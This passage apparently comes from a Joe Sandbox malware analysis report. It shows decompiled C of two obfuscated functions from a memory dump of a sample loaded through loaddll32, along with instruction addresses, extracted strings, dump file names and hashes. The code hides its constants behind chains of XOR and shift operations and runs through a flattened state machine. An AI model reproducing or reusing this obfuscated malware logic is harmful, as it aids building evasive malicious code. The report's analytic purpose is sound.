				signed int _v608;
				signed int _v612;
				signed int _v616;
				signed int _v620;
				signed int _v624;
				signed int _v628;
				signed int _v632;
				signed int _v636;
				signed int _v640;
				signed int _v644;
				signed int _v648;
				signed int _v652;
				signed int _v656;
				signed int _v660;
				signed int _v664;
				signed int _v668;
				signed int _v672;
				signed int _v676;
				signed int _v680;
				signed int _v684;
				signed int _v688;
				signed int _v692;
				signed int _v696;
				signed int _v700;
				signed int _v704;
				unsigned int _v708;
				signed int _t316;
				void* _t319;
				intOrPtr _t320;
				intOrPtr _t323;
				intOrPtr _t328;
				void* _t331;
				void* _t334;
				void* _t335;
				char _t342;
				signed int _t365;
				signed int _t366;
				signed int _t367;
				signed int _t368;
				signed int _t369;
				unsigned int* _t372;

				_t372 =  &_v708;
				_v576 = 0xda0c08;
				_v576 = _v576 + 0xffff47d7;
				_t335 = 0x67615db;
				_v576 = _v576 ^ 0x00d953de;
				_v616 = 0x1aa62a;
				_v616 = _v616 ^ 0x887273cb;
				_v616 = _v616 ^ 0x8868d4e1;
				_v696 = 0x6cc5ff;
				_v696 = _v696 + 0xffff0f33;
				_v696 = _v696 + 0xffffebff;
				_v696 = _v696 + 0xffff9323;
				_v696 = _v696 ^ 0x006b5457;
				_v620 = 0xd441f6;
				_v620 = _v620 >> 2;
				_v620 = _v620 ^ 0x0035107d;
				_v668 = 0xe6e8c4;
				_v668 = _v668 + 0xffff0cc3;
				_v668 = _v668 | 0x11364c4e;
				_v668 = _v668 ^ 0x11fae4e7;
				_v664 = 0xedeede;
				_v664 = _v664 + 0x8dc4;
				_v664 = _v664 >> 0xb;
				_v664 = _v664 ^ 0x00096569;
				_v644 = 0x7bf23b;
				_v644 = _v644 + 0x7679;
				_v644 = _v644 << 2;
				_v644 = _v644 ^ 0x01f0e7c7;
				_v588 = 0xd55e4f;
				_v588 = _v588 >> 8;
				_v588 = _v588 ^ 0x000a9525;
				_v648 = 0x4b711e;
				_v648 = _v648 + 0xffff1f62;
				_v648 = _v648 ^ 0xa93f12d6;
				_v648 = _v648 ^ 0xa9763896;
				_v584 = 0xdb5f0a;
				_v584 = _v584 * 0x19;
				_t334 = 0;
				_v584 = _v584 ^ 0x156e4d85;
				_v608 = 0x3263c9;
				_v608 = _v608 + 0xe60;
				_v608 = _v608 ^ 0x0036f835;
				_v640 = 0x3b5ffd;
				_t365 = 0x46;
				_v640 = _v640 * 5;
				_v640 = _v640 / _t365;
				_v640 = _v640 ^ 0x000ce458;
				_v708 = 0xb95ed6;
				_t366 = 0x5a;
				_v708 = _v708 / _t366;
				_v708 = _v708 ^ 0x64dff63e;
				_v708 = _v708 >> 0x10;
				_v708 = _v708 ^ 0x000970e9;
				_v672 = 0xda5c0b;
				_v672 = _v672 >> 5;
				_v672 = _v672 * 0x6e;
				_v672 = _v672 ^ 0x02ed68c8;
				_v600 = 0xb0c206;
				_v600 = _v600 + 0x21e9;
				_v600 = _v600 ^ 0x00b07205;
				_v684 = 0x1b8021;
				_v684 = _v684 << 2;
				_v684 = _v684 >> 0xb;
				_v684 = _v684 << 8;
				_v684 = _v684 ^ 0x0007a69d;
				_v700 = 0x716346;
				_v700 = _v700 >> 0xe;
				_v700 = _v700 << 9;
				_v700 = _v700 | 0x54417142;
				_v700 = _v700 ^ 0x544d1ccb;
				_v704 = 0x83733f;
				_v704 = _v704 << 0xe;
				_v704 = _v704 << 1;
				_t367 = 0xf;
				_v704 = _v704 / _t367;
				_v704 = _v704 ^ 0x0c51ca4a;
				_v676 = 0x255e7;
				_v676 = _v676 ^ 0x45c0186f;
				_v676 = _v676 ^ 0x0e243a79;
				_v676 = _v676 ^ 0x4be8c079;
				_v652 = 0xc8a42f;
				_t368 = 0x3b;
				_v652 = _v652 * 0x1e;
				_v652 = _v652 + 0xffffdb98;
				_v652 = _v652 ^ 0x178e8932;
				_v660 = 0x399dd9;
				_v660 = _v660 << 0x10;
				_v660 = _v660 << 1;
				_v660 = _v660 ^ 0x3bb87d79;
				_v596 = 0x4a6152;
				_v596 = _v596 + 0xeb3a;
				_v596 = _v596 ^ 0x00451e15;
				_v604 = 0x1a296a;
				_v604 = _v604 >> 3;
				_v604 = _v604 ^ 0x000806f7;
				_v628 = 0x8a6a9a;
				_v628 = _v628 << 0xc;
				_v628 = _v628 / _t368;
				_v628 = _v628 ^ 0x02ddb0c3;
				_v612 = 0x56dff1;
				_v612 = _v612 << 4;
				_v612 = _v612 ^ 0x056559b2;
				_v592 = 0xb835f;
				_v592 = _v592 ^ 0x56373199;
				_v592 = _v592 ^ 0x563f1b5a;
				_v636 = 0x2555d1;
				_v636 = _v636 + 0xffff7c76;
				_v636 = _v636 | 0x931e680c;
				_v636 = _v636 ^ 0x933edc2a;
				_v688 = 0x729e7a;
				_v688 = _v688 + 0x52a9;
				_v688 = _v688 << 6;
				_v688 = _v688 ^ 0x08219d26;
				_v688 = _v688 ^ 0x149a839d;
				_v656 = 0xbb5b70;
				_v656 = _v656 + 0x6c7b;
				_v656 = _v656 | 0x24d7418a;
				_v656 = _v656 ^ 0x24f0c3f7;
				_v692 = 0xac0342;
				_v692 = _v692 + 0x6c81;
				_v692 = _v692 >> 0xd;
				_v692 = _v692 + 0xbde1;
				_v692 = _v692 ^ 0x00055202;
				_v632 = 0x18da0d;
				_t369 = 0x57;
				_v632 = _v632 * 0x5d;
				_v632 = _v632 + 0xffff6f25;
				_v632 = _v632 ^ 0x090e1c26;
				_v580 = 0xa5e89c;
				_v580 = _v580 / _t369;
				_v580 = _v580 ^ 0x000ce540;
				_v680 = 0x842c1c;
				_v680 = _v680 << 5;
				_v680 = _v680 ^ 0x259e7cb4;
				_v680 = _v680 + 0xffff46bd;
				_v680 = _v680 ^ 0x3515c03d;
				_v624 = 0x501187;
				_v624 = _v624 ^ 0x46ba0327;
				_v624 = _v624 ^ 0x46eeb458;
				_t364 = _v624;
				do {
					while(_t335 != 0x2d5e71a) {
						if(_t335 == 0x67615db) {
							_t335 = 0xf75ce9f;
							continue;
						} else {
							if(_t335 == 0x7a053ff) {
								E02B51538(_v680, _v624, _t364);
							} else {
								if(_t335 == 0x7a51f41) {
									_push(_v640);
									_push(_v608);
									_push(_v584);
									_t319 = E02B4E1F8(0x2b31000, _v648, __eflags);
									_t320 =  *0x2b56214; // 0x0
									_t323 =  *0x2b56214; // 0x0
									E02B52D0A(_v672, __eflags, _t323 + 0x23c, _v600, _v684, _v700, 0x2b31000,  &_v524, _t320 + 0x34, _t319);
									E02B4FECB(_t319, _v704, _v676, _v652, _v660);
									_t372 =  &(_t372[0xe]);
									_t335 = 0x2d5e71a;
									continue;
								} else {
									if(_t335 == 0xa48fbff) {
										_v572 = _v572 - E02B35477(_t335);
										_t335 = 0x7a51f41;
										asm("sbb [esp+0x9c], edx");
										continue;
									} else {
										if(_t335 == 0xd7f7f02) {
											_t328 = _v568;
											_t342 = _v572;
											_v560 = _t328;
											_v552 = _t328;
											_v544 = _t328;
											_v536 = _t328;
											_v532 = _v620;
											_v564 = _t342;
											_v556 = _t342;
											_v548 = _t342;
											_v540 = _t342;
											_t331 = E02B544FF(_v656, _v692, _t342, _v632, _t342, _v580,  &_v564, _t364);
											_t372 =  &(_t372[6]);
											__eflags = _t331;
											_t334 =  !=  ? 1 : _t334;
											_t335 = 0x7a053ff;
											continue;
										} else {
											if(_t335 != 0xf75ce9f) {
												goto L16;
											} else {
												E02B4CA1F(_v668, _v664,  &_v572, _v644, _v588);
												_t372 =  &(_t372[3]);
												_t335 = 0xa48fbff;
												continue;
											}
										}
									}
								}
							}
						}
						L19:
						return _t334;
					}
					_t316 = E02B545CA( &_v524, _v596, _t335, _t335, _v604, _v628, _v612, _v616, _v592, _v636, 0, _v688, _v696, _v576);
					_t364 = _t316;
					_t372 =  &(_t372[0xc]);
					__eflags = _t316 - 0xffffffff;
					if(__eflags == 0) {
						_t335 = 0xc46350e;
						goto L16;
					} else {
						_t335 = 0xd7f7f02;
						continue;
					}
					goto L19;
					L16:
					__eflags = _t335 - 0xc46350e;
				} while (__eflags != 0);
				goto L19;
			}

0x02b4e955
0x02b4e95f
0x02b4e96c
0x02b4e977
0x02b4e97c
0x02b4e987
0x02b4e98f
0x02b4e997
0x02b4e99f
0x02b4e9a7
0x02b4e9af
0x02b4e9b7
0x02b4e9bf
0x02b4e9c7
0x02b4e9cf
0x02b4e9d4
0x02b4e9dc
0x02b4e9e4
0x02b4e9ec
0x02b4e9f4
0x02b4e9fc
0x02b4ea04
0x02b4ea0c
0x02b4ea11
0x02b4ea19
0x02b4ea21
0x02b4ea29
0x02b4ea2e
0x02b4ea36
0x02b4ea41
0x02b4ea49
0x02b4ea54
0x02b4ea5c
0x02b4ea64
0x02b4ea6c
0x02b4ea74
0x02b4ea87
0x02b4ea8e
0x02b4ea90
0x02b4ea9b
0x02b4eaa3
0x02b4eaab
0x02b4eab3
0x02b4eac2
0x02b4eac5
0x02b4ead1
0x02b4ead5
0x02b4eadd
0x02b4eae9
0x02b4eaec
0x02b4eaf0
0x02b4eaf8
0x02b4eafd
0x02b4eb05
0x02b4eb0d
0x02b4eb17
0x02b4eb1b
0x02b4eb23
0x02b4eb2b
0x02b4eb33
0x02b4eb3b
0x02b4eb43
0x02b4eb48
0x02b4eb4d
0x02b4eb52
0x02b4eb5a
0x02b4eb62
0x02b4eb67
0x02b4eb6e
0x02b4eb76
0x02b4eb7e
0x02b4eb86
0x02b4eb8b
0x02b4eb95
0x02b4eb9a
0x02b4eba0
0x02b4eba8
0x02b4ebb0
0x02b4ebb8
0x02b4ebc0
0x02b4ebc8
0x02b4ebd5
0x02b4ebd8
0x02b4ebdc
0x02b4ebe4
0x02b4ebec
0x02b4ebf4
0x02b4ebf9
0x02b4ebfd
0x02b4ec05
0x02b4ec10
0x02b4ec1b
0x02b4ec26
0x02b4ec2e
0x02b4ec33
0x02b4ec3b
0x02b4ec43
0x02b4ec50
0x02b4ec54
0x02b4ec5c
0x02b4ec64
0x02b4ec69
0x02b4ec71
0x02b4ec7c
0x02b4ec87
0x02b4ec92
0x02b4ec9a
0x02b4eca2
0x02b4ecaa
0x02b4ecb2
0x02b4ecba
0x02b4ecc2
0x02b4ecc7
0x02b4eccf
0x02b4ecd7
0x02b4ecdf
0x02b4ece7
0x02b4ecef
0x02b4ecf7
0x02b4ecff
0x02b4ed07
0x02b4ed0c
0x02b4ed14
0x02b4ed1c
0x02b4ed29
0x02b4ed2a
0x02b4ed2e
0x02b4ed36
0x02b4ed3e
0x02b4ed52
0x02b4ed59
0x02b4ed64
0x02b4ed6c
0x02b4ed71
0x02b4ed79
0x02b4ed86
0x02b4ed8e
0x02b4ed96
0x02b4ed9e
0x02b4eda6
0x02b4edaa
0x02b4edaa
0x02b4edbc
0x02b4ef46
0x00000000
0x02b4edc2
0x02b4edc8
0x02b4efca
0x02b4edce
0x02b4edd4
0x02b4eec6
0x02b4eecf
0x02b4eed3
0x02b4eede
0x02b4eee8
0x02b4ef0a
0x02b4ef1d
0x02b4ef34
0x02b4ef39
0x02b4ef3c
0x00000000
0x02b4edda
0x02b4ede0
0x02b4eeae
0x02b4eeb5
0x02b4eeba
0x00000000
0x02b4ede6
0x02b4ede8
0x02b4ee20
0x02b4ee27
0x02b4ee2e
0x02b4ee35
0x02b4ee3c
0x02b4ee43
0x02b4ee4f
0x02b4ee65
0x02b4ee75
0x02b4ee7c
0x02b4ee83
0x02b4ee8f
0x02b4ee96
0x02b4ee9a
0x02b4ee9c
0x02b4ee9f
0x00000000
0x02b4edea
0x02b4edf0
0x00000000
0x02b4edf6
0x02b4ee11
0x02b4ee16
0x02b4ee19
0x00000000
0x02b4ee19
0x02b4edf0
0x02b4ede8
0x02b4ede0
0x02b4edd4
0x02b4edc8
0x02b4efd3
0x02b4efdc
0x02b4efdc
0x02b4ef98
0x02b4ef9d
0x02b4ef9f
0x02b4efa2
0x02b4efa5
0x02b4efae
0x00000000
0x02b4efa7
0x02b4efa7
0x00000000
0x02b4efa7
0x00000000
0x02b4efb3
0x02b4efb3
0x02b4efb3
0x00000000

Strings

p, xrefs: 02B4EAFD
{l, xrefs: 02B4ECDF
:, xrefs: 02B4EC10
BqAT, xrefs: 02B4EB6E
RaJ, xrefs: 02B4EC05
ie, xrefs: 02B4EA11
WTk, xrefs: 02B4E9BF
yv, xrefs: 02B4EA21
!, xrefs: 02B4EB2B

Memory Dump Source

Source File: 00000001.00000002.321766377.0000000002B31000.00000020.00000001.sdmp, Offset: 02B30000, based on PE: true

Associated: 00000001.00000002.321760643.0000000002B30000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.321787146.0000000002B56000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2b30000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: :$BqAT$RaJ$WTk$ie$yv${l$!$p
API String ID: 0-4263964199
Opcode ID: 56821719a1239a04bf3021a927ab183420f3f9c7f1356983931d858a3159c1bb
Instruction ID: 02c409e6d6b16b6127ed2f3ad1e7602f4c19ec7102a59cb8e519fecac63fff8a
Opcode Fuzzy Hash: 56821719a1239a04bf3021a927ab183420f3f9c7f1356983931d858a3159c1bb
Instruction Fuzzy Hash: E0F12F714093808FD3A8CF65D589A5BFBF1FBC4758F50891DE2AA86260DBB18949CF43

Uniqueness

Uniqueness Score: -1.00%

Function 02B536AA, Relevance: 10.4, Strings: 8, Instructions: 359
COMMONCrypto

Download Yara Rule

C-Code - Quality: 97%

			E02B536AA() {
				signed int _t373;
				signed int _t378;
				signed int _t379;
				signed int _t382;
				intOrPtr _t383;
				signed int _t385;
				signed int _t387;
				void* _t392;
				signed int _t435;
				signed int _t438;
				signed int _t439;
				signed int _t440;
				signed int _t441;
				signed int _t442;
				signed int _t443;
				signed int _t444;
				signed int _t445;
				signed int _t446;
				signed int _t447;
				signed int _t449;
				signed int* _t453;

				 *_t453 = 0x507140;
				_t392 = 0xe12044f;
				_t453[4] =  *_t453 * 0x71;
				_t438 = 0x6b;
				_t453[5] = _t453[4] / _t438;
				_t453[5] = _t453[5] >> 9;
				_t453[5] = _t453[5] ^ 0x00002a7b;
				_t453[9] = 0x87b94d;
				_t453[9] = _t453[9] + 0xffff92a0;
				_t453[9] = _t453[9] + 0x79ac;
				_t453[9] = _t453[9] >> 3;
				_t453[9] = _t453[9] ^ 0x0010f8b2;
				_t453[0x18] = 0x43735f;
				_t453[0x18] = _t453[0x18] << 0xa;
				_t453[0x18] = _t453[0x18] + 0xffff408e;
				_t453[0x18] = _t453[0x18] ^ 0x0dccbc8d;
				_t453[0x19] = 0x2e99ff;
				_t439 = 0x48;
				_push("true");
				_t453[0x19] = _t453[0x19] / _t439;
				_t453[0x19] = _t453[0x19] | 0xc1c83132;
				_t453[0x19] = _t453[0x19] ^ 0xc1c60879;
				_t453[0xc] = 0xdcf188;
				_pop(_t440);
				_t453[0x2b] = _t453[0x2b] & 0x00000000;
				_t453[0xc] = _t453[0xc] * 0x48;
				_t453[0xc] = _t453[0xc] + 0xb8d0;
				_t453[0xc] = _t453[0xc] + 0xe79e;
				_t453[0xc] = _t453[0xc] ^ 0x3e220605;
				_t453[0x1f] = 0x3f10b8;
				_t453[0x1f] = _t453[0x1f] | 0x536a71f8;
				_t453[0x1f] = _t453[0x1f] ^ 0x537d907f;
				_t453[0x17] = 0xda4ece;
				_t453[0x17] = _t453[0x17] / _t440;
				_t453[0x17] = _t453[0x17] + 0xffff6c3f;
				_t453[0x17] = _t453[0x17] ^ 0x000916d6;
				_t453[0x21] = 0x81e16;
				_t441 = 0x1f;
				_t453[0x20] = _t453[0x21] * 0x37;
				_t453[0x20] = _t453[0x20] ^ 0x01bbd9e8;
				_t453[0x12] = 0x23ff7a;
				_t453[0x12] = _t453[0x12] + 0xda88;
				_t453[0x12] = _t453[0x12] << 9;
				_t453[0x12] = _t453[0x12] ^ 0x49b967a0;
				_t453[0x25] = 0xa4ae1d;
				_t453[0x25] = _t453[0x25] + 0xffff1e93;
				_t453[0x25] = _t453[0x25] ^ 0x00a3b794;
				_t453[0x1a] = 0xc58380;
				_t453[0x1a] = _t453[0x1a] + 0xffff63f4;
				_t453[0x1a] = _t453[0x1a] ^ 0x00c360dd;
				_t453[0xa] = 0x315c71;
				_t453[0xa] = _t453[0xa] * 0x2d;
				_t453[0xa] = _t453[0xa] << 4;
				_t453[0xa] = _t453[0xa] >> 9;
				_t453[0xa] = _t453[0xa] ^ 0x004c0641;
				_t453[0x26] = 0xfaa693;
				_t453[0x26] = _t453[0x26] / _t441;
				_t453[0x26] = _t453[0x26] ^ 0x0006da62;
				_t453[6] = 0x2e22d8;
				_t453[6] = _t453[6] + 0x1da5;
				_t453[6] = _t453[6] ^ 0x7a3436a8;
				_t453[6] = _t453[6] + 0x3380;
				_t453[6] = _t453[6] ^ 0x7a1ea83a;
				_t453[0xe] = 0x225cf9;
				_t442 = 0x46;
				_t453[0xf] = _t453[0xe] * 0xd;
				_t453[0xf] = _t453[0xf] / _t442;
				_t453[0xf] = _t453[0xf] ^ 0x000c9e58;
				_t453[0x1e] = 0xb4cd70;
				_t443 = 5;
				_t453[0x1e] = _t453[0x1e] / _t443;
				_t453[0x1e] = _t453[0x1e] ^ 0x00223e8b;
				_t453[0x25] = 0x175145;
				_t453[0x25] = _t453[0x25] + 0xffffbe60;
				_t453[0x25] = _t453[0x25] ^ 0x0015ea4b;
				_t453[0x16] = 0x9a90a6;
				_t453[0x16] = _t453[0x16] >> 1;
				_t453[0x16] = _t453[0x16] | 0x97e6917e;
				_t453[0x16] = _t453[0x16] ^ 0x97edbee9;
				_t453[0x14] = 0x10553c;
				_t453[0x14] = _t453[0x14] | 0x69ed7b68;
				_t453[0x14] = _t453[0x14] ^ 0x8ccf5101;
				_t453[0x14] = _t453[0x14] ^ 0xe532736d;
				_t453[0x12] = 0x5e103c;
				_t453[0x12] = _t453[0x12] ^ 0xd5bdf2ed;
				_t453[0x12] = _t453[0x12] | 0x536bb37e;
				_t453[0x12] = _t453[0x12] ^ 0xd7e39e3a;
				_t453[6] = 0xad714c;
				_t453[6] = _t453[6] << 5;
				_t444 = 0x5a;
				_t453[6] = _t453[6] * 0x77;
				_t453[6] = _t453[6] | 0x8fd7f967;
				_t453[6] = _t453[6] ^ 0x9ffa7b5b;
				_t453[0x29] = 0x969a62;
				_t453[0x29] = _t453[0x29] + 0xffff3747;
				_t453[0x29] = _t453[0x29] ^ 0x009bad24;
				_t453[0x22] = 0xa29aa2;
				_t453[0x22] = _t453[0x22] + 0xffff9bca;
				_t453[0x22] = _t453[0x22] ^ 0x00a8d7f4;
				_t453[0x28] = 0x5c718d;
				_t453[0x28] = _t453[0x28] / _t444;
				_t453[0x28] = _t453[0x28] ^ 0x000e04a7;
				_t453[0x15] = 0x6aed70;
				_t453[0x15] = _t453[0x15] | 0x24270adc;
				_t453[0x15] = _t453[0x15] ^ 0x00a30154;
				_t453[0x15] = _t453[0x15] ^ 0x24c5236d;
				_t453[0x20] = 0x9ad963;
				_t453[0x20] = _t453[0x20] ^ 0x804e7f4a;
				_t453[0x20] = _t453[0x20] ^ 0x80d9ea50;
				_t453[0x1c] = 0xc68496;
				_t453[0x1c] = _t453[0x1c] >> 0x10;
				_t453[0x1c] = _t453[0x1c] ^ 0x0003f168;
				_t453[0x24] = 0x7e4214;
				_t453[0x24] = _t453[0x24] << 4;
				_t453[0x24] = _t453[0x24] ^ 0x07e08805;
				_t453[0x11] = 0x92d404;
				_t445 = 0x3c;
				_t453[0x10] = _t453[0x11] / _t445;
				_t453[0x10] = _t453[0x10] + 0x2a76;
				_t453[0x10] = _t453[0x10] ^ 0x0004ebe7;
				_t453[9] = 0xe8ea05;
				_t453[9] = _t453[9] + 0xffffd5a4;
				_t453[9] = _t453[9] << 7;
				_t453[9] = _t453[9] + 0xffff1c2a;
				_t453[9] = _t453[9] ^ 0x7454948f;
				_t453[7] = 0x853308;
				_t453[7] = _t453[7] + 0xffff5128;
				_t453[7] = _t453[7] + 0x9f37;
				_t453[7] = _t453[7] | 0x54c51839;
				_t453[7] = _t453[7] ^ 0x54ca1cec;
				_t453[0x1c] = 0x270edd;
				_t453[0x1c] = _t453[0x1c] + 0x9c5c;
				_t453[0x1c] = _t453[0x1c] ^ 0x00251ad9;
				_t453[0x22] = 0x4b1e01;
				_t453[0x22] = _t453[0x22] >> 0xa;
				_t453[0x22] = _t453[0x22] ^ 0x00014be5;
				_t453[0xf] = 0x1097d4;
				_t453[0xf] = _t453[0xf] ^ 0x70356bb9;
				_t453[0xf] = _t453[0xf] << 7;
				_t453[0xf] = _t453[0xf] ^ 0x12f26116;
				_t453[0xd] = 0x3e61;
				_t453[0xd] = _t453[0xd] ^ 0x4940d563;
				_t453[0xd] = _t453[0xd] << 5;
				_t453[0xd] = _t453[0xd] ^ 0x28127601;
				_t453[0x19] = 0xea3040;
				_t265 =  &(_t453[0x19]); // 0xea3040
				_t446 = 0x24;
				_t390 = _t453[0x2a];
				_t453[0x1a] =  *_t265 * 0x3e;
				_t435 = _t453[0x2a];
				_t453[0x1a] = _t453[0x1a] / _t446;
				_t453[0x1a] = _t453[0x1a] ^ 0x01901c81;
				_t453[0xd] = 0xdd1c82;
				_t447 = 0x39;
				_t451 = _t453[0x29];
				_t453[0xc] = _t453[0xd] * 0x64;
				_t453[0xc] = _t453[0xc] / _t447;
				_t453[0xc] = _t453[0xc] ^ 0x01838ff7;
				L1:
				while(1) {
					while(_t392 != 0x17dddcb) {
						if(_t392 == 0x8a29766) {
							E02B52B09(_t453[0x24], _t435, _t453[0x10], _t453[0xd]);
							_t392 = 0xcdeb26f;
							continue;
						} else {
							if(_t392 == 0xac116a6) {
								E02B50DB1(_t453[0x1b],  &(_t453[0x2d]), __eflags, _t453[0xd], _t392, _t453[0x1e]);
								_t373 = E02B409DD(_t453[0x1b],  &(_t453[0x30]), _t453[0x24], _t453[0x15]);
								_t451 = _t373;
								_t453 =  &(_t453[5]);
								_t392 = 0xf1147e4;
								 *((short*)(_t373 - 2)) = 0;
								continue;
							} else {
								if(_t392 == 0xcdeb26f) {
									_t337 =  &(_t453[0x19]); // 0xea3040
									E02B51538( *_t337, _t453[0xc], _t390);
								} else {
									if(_t392 == 0xe12044f) {
										_t392 = 0xac116a6;
										continue;
									} else {
										if(_t392 == 0xe899f05) {
											_t378 = E02B4E406(_t453[0x11], _t453[0x33], _t392, _t453[0x2b], _t453[0x30], _t435, _t453[0xb], _t392,  &(_t453[0x2e]), _t453[0x2d], _t453[0x17], _t453[0x21], _t392, _t390);
											_t453 =  &(_t453[0xc]);
											__eflags = _t378;
											if(_t378 == 0) {
												L17:
												_t379 = _t453[0x2a];
											} else {
												_t449 = _t435;
												while(1) {
													__eflags =  *((intOrPtr*)(_t449 + 4)) - 4;
													if( *((intOrPtr*)(_t449 + 4)) != 4) {
														goto L14;
													}
													L13:
													_t387 = E02B5061D(_t453[0x1d], _t451, _t449 + 0xc, _t453[0x24], _t453[0x10]);
													_t453 =  &(_t453[3]);
													__eflags = _t387;
													if(_t387 == 0) {
														_t379 = 1;
														_t453[0x2a] = 1;
													} else {
														goto L14;
													}
													goto L18;
													L14:
													_t385 =  *_t449;
													__eflags = _t385;
													if(_t385 == 0) {
														goto L17;
													} else {
														_t449 = _t449 + _t385;
														__eflags =  *((intOrPtr*)(_t449 + 4)) - 4;
														if( *((intOrPtr*)(_t449 + 4)) != 4) {
															goto L14;
														}
													}
													goto L18;
												}
											}
											L18:
											__eflags = _t379;
											if(__eflags == 0) {
												L20:
												_t392 = 0xe899f05;
											} else {
												_t383 =  *0x2b56208; // 0x0
												E02B527BC(_t453[0xa], _t453[8],  *((intOrPtr*)(_t383 + 0x18)), _t453[0x1c]);
												_t392 = 0x8a29766;
											}
											continue;
											L30:
										} else {
											if(_t392 != 0xf1147e4) {
												L26:
												__eflags = _t392 - 0x2906cf2;
												if(__eflags != 0) {
													continue;
												} else {
												}
											} else {
												_t382 = E02B545CA( &(_t453[0x38]), _t453[0x2f], _t392, _t392, _t453[0x23], _t453[0x12], _t453[0x2d], 1, _t453[0xb], _t453[0x12], 0x2000000, _t453[0x1f], _t453[0x18], _t453[8] | 0x00000006);
												_t390 = _t382;
												_t453 =  &(_t453[0xc]);
												if(_t382 != 0xffffffff) {
													_t392 = 0x17dddcb;
													continue;
												}
											}
										}
									}
								}
							}
						}
						L29:
						__eflags = 0;
						return 0;
						goto L30;
					}
					_push(_t392);
					_push(_t392);
					_t453[0x2c] = 0x1000;
					_t435 = E02B3C5D8(0x1000);
					_t453 =  &(_t453[3]);
					__eflags = _t435;
					if(__eflags != 0) {
						goto L20;
					} else {
						_t392 = 0xcdeb26f;
						goto L26;
					}
					goto L29;
				}
			}

0x02b536b0
0x02b536bd
0x02b536c6
0x02b536d0
0x02b536d5
0x02b536db
0x02b536e0
0x02b536e8
0x02b536f0
0x02b536f8
0x02b53700
0x02b53705
0x02b5370d
0x02b53715
0x02b5371a
0x02b53722
0x02b5372a
0x02b53736
0x02b53739
0x02b5373b
0x02b53741
0x02b53749
0x02b53751
0x02b5375e
0x02b53761
0x02b53769
0x02b5376d
0x02b53775
0x02b5377d
0x02b53785
0x02b5378d
0x02b53795
0x02b5379d
0x02b537ad
0x02b537b1
0x02b537b9
0x02b537c1
0x02b537d4
0x02b537d5
0x02b537dc
0x02b537e7
0x02b537ef
0x02b537f7
0x02b537fc
0x02b53804
0x02b5380f
0x02b5381a
0x02b53825
0x02b5382d
0x02b53835
0x02b5383d
0x02b5384a
0x02b5384e
0x02b53853
0x02b53858
0x02b53860
0x02b53874
0x02b5387b
0x02b53886
0x02b53890
0x02b53898
0x02b538a0
0x02b538a8
0x02b538b0
0x02b538bf
0x02b538c2
0x02b538ce
0x02b538d2
0x02b538da
0x02b538e6
0x02b538eb
0x02b538f1
0x02b538f9
0x02b53904
0x02b5390f
0x02b5391a
0x02b53922
0x02b53926
0x02b5392e
0x02b53936
0x02b5393e
0x02b53946
0x02b5394e
0x02b53956
0x02b5395e
0x02b53966
0x02b5396e
0x02b53976
0x02b5397e
0x02b53988
0x02b5398b
0x02b5398f
0x02b53997
0x02b5399f
0x02b539aa
0x02b539b5
0x02b539c0
0x02b539cb
0x02b539d6
0x02b539e1
0x02b539f7
0x02b539fe
0x02b53a09
0x02b53a11
0x02b53a19
0x02b53a21
0x02b53a29
0x02b53a34
0x02b53a3f
0x02b53a4a
0x02b53a52
0x02b53a57
0x02b53a5f
0x02b53a6a
0x02b53a72
0x02b53a7d
0x02b53a89
0x02b53a8c
0x02b53a90
0x02b53a98
0x02b53aa0
0x02b53aa8
0x02b53ab2
0x02b53ab7
0x02b53abf
0x02b53ac7
0x02b53acf
0x02b53ad7
0x02b53adf
0x02b53ae7
0x02b53aef
0x02b53af7
0x02b53aff
0x02b53b07
0x02b53b12
0x02b53b1a
0x02b53b25
0x02b53b2d
0x02b53b35
0x02b53b3a
0x02b53b42
0x02b53b4a
0x02b53b52
0x02b53b57
0x02b53b5f
0x02b53b67
0x02b53b6e
0x02b53b71
0x02b53b78
0x02b53b84
0x02b53b8b
0x02b53b8f
0x02b53b97
0x02b53ba4
0x02b53ba5
0x02b53bac
0x02b53bb6
0x02b53bba
0x00000000
0x02b53bc2
0x02b53bc2
0x02b53bd4
0x02b53d95
0x02b53d9c
0x00000000
0x02b53bda
0x02b53be0
0x02b53d4f
0x02b53d6a
0x02b53d6f
0x02b53d71
0x02b53d76
0x02b53d7b
0x00000000
0x02b53be6
0x02b53bec
0x02b53df4
0x02b53df9
0x02b53bf2
0x02b53bf8
0x02b53d31
0x00000000
0x02b53bfe
0x02b53c04
0x02b53cac
0x02b53cb1
0x02b53cb4
0x02b53cb6
0x02b53cf7
0x02b53cf7
0x02b53cb8
0x02b53cb8
0x02b53cba
0x02b53cba
0x02b53cbe
0x00000000
0x00000000
0x02b53cc0
0x02b53cd5
0x02b53cda
0x02b53cdd
0x02b53cdf
0x02b53ced
0x02b53cee
0x00000000
0x00000000
0x00000000
0x00000000
0x02b53ce1
0x02b53ce1
0x02b53ce3
0x02b53ce5
0x00000000
0x02b53ce7
0x02b53ce7
0x02b53cba
0x02b53cbe
0x00000000
0x00000000
0x02b53cbe
0x00000000
0x02b53ce5
0x02b53cba
0x02b53cfe
0x02b53cfe
0x02b53d00
0x02b53d27
0x02b53d27
0x02b53d02
0x02b53d06
0x02b53d16
0x02b53d1d
0x02b53d1d
0x00000000
0x00000000
0x02b53c06
0x02b53c0c
0x02b53de2
0x02b53de2
0x02b53de8
0x00000000
0x00000000
0x02b53dee
0x02b53c12
0x02b53c53
0x02b53c58
0x02b53c5a
0x02b53c60
0x02b53c66
0x00000000
0x02b53c66
0x02b53c60
0x02b53c0c
0x02b53c04
0x02b53bf8
0x02b53bec
0x02b53be0
0x02b53dff
0x02b53e02
0x02b53e0b
0x00000000
0x02b53e0b
0x02b53db9
0x02b53dba
0x02b53dc0
0x02b53dd0
0x02b53dd2
0x02b53dd5
0x02b53dd7
0x00000000
0x02b53ddd
0x02b53ddd
0x00000000
0x02b53ddd
0x00000000
0x02b53dd7

Strings

v*, xrefs: 02B53A90
a>, xrefs: 02B53B42
{*, xrefs: 02B536E0
ms2, xrefs: 02B5394E
q\1, xrefs: 02B5383D
pj, xrefs: 02B53A09
@0, xrefs: 02B53B67
_sC, xrefs: 02B5370D

Memory Dump Source

Source File: 00000001.00000002.321766377.0000000002B31000.00000020.00000001.sdmp, Offset: 02B30000, based on PE: true

Associated: 00000001.00000002.321760643.0000000002B30000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.321787146.0000000002B56000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2b30000_loaddll32.jbxd

Yara matches

Similarity

API ID:
